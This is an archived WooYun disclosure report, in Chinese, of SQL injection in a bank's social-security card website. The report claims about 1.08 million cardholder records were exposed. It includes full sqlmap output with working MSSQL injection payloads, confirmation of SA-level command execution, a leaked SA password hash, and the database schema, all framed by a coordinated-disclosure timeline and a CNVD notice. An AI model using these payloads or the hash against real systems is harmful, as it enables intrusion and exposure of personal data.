乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2016-03-30: 细节已通知厂商并且等待厂商处理中 2016-04-01: 厂商已经确认,细节仅向厂商公开 2016-04-11: 细节向核心白帽子及相关领域专家公开 2016-04-21: 细节向普通白帽子公开 2016-05-01: 细节向实习白帽子公开 2016-05-16: 细节向公众公开
如题、、、
药都银行社保网站某处漏洞直接导致上百万(1078442)社保卡信息泄露(单位名、姓名、身份证)。。。发现是SA权限 可以直接getshell 这里就没有近一步深入了。。。。点到为止、、、泄露上百万的社保信息 dbo.CARDS | 1078442 |注入点:http://**.**.**.**/Web/LianxiDetail.aspx?dwcode=
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: dwcode Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: dwcode=' AND 8199=CONVERT(INT,(CHAR(58) CHAR(98) CHAR(105) CHAR(120) CHAR(58) (SELECT (CASE WHEN (8199=8199) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(113) CHAR(113) CHAR(106) CHAR(58))) AND 'emiL'='emiL Type: UNION query Title: Generic UNION query (NULL) - 4 columns Payload: dwcode=' UNION ALL SELECT NULL,NULL,CHAR(58) CHAR(98) CHAR(105) CHAR(120) CHAR(58) CHAR(65) CHAR(102) CHAR(119) CHAR(71) CHAR(84) CHAR(76) CHAR(73) CHAR(84) CHAR(71) CHAR(81) CHAR(58) CHAR(113) CHAR(113) CHAR(106) CHAR(58),NULL-- Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries Payload: dwcode='; WAITFOR DELAY '0:0:5'-- Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind Payload: dwcode=' WAITFOR DELAY '0:0:5'-----[22:53:00] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2005available databases [6]:[*] master[*] model[*] msdb[*] tempdb[*] webshebao[*] zwcrmcurrent user: 'sa'[23:10:57] [INFO] retrieved: "nt authority\\\\system"command standard output [1]:[*] nt authority\systemD:\YCCB_WORK\社保卡发放小秘书\NongJin\HongZhi.Pro.Bank.Web.NongJin\CLASS\DAL\CARD_DAL.cs:150database management system users password hashes:[*] sa [1]: password hash: 0x01004086ceb618b79b04cd0e09daaf6c1290848db4372d779541 header: 0x0100 salt: 4086ceb6 mixedcase: 18b79b04cd0e09daaf6c1290848db4372d779541current database: 'webshebao'
Database: webshebao[2 tables]+-------+| CARDS || LX |+-------+Database: webshebao+-----------+---------+| Table | Entries |+-----------+---------+| dbo.CARDS | 1078442 | 单位名、姓名、身份证| dbo.LX | 50 |+-----------+---------+Database: webshebaoTable: CARDS[6 columns]+--------------+----------+| Column | Type |+--------------+----------+| dwname | nvarchar || ID | int || name | nvarchar || shenfenzheng | nvarchar || shoulicode | nvarchar || state | nvarchar |+--------------+----------+
危害等级:高
漏洞Rank:11
确认时间:2016-04-01 17:38
CNVD确认所述情况,已经转由CNCERT向银行业信息化主管部门通报,由其后续协调网站管理单位处置;同时转由CNCERT发安徽分中心。
暂无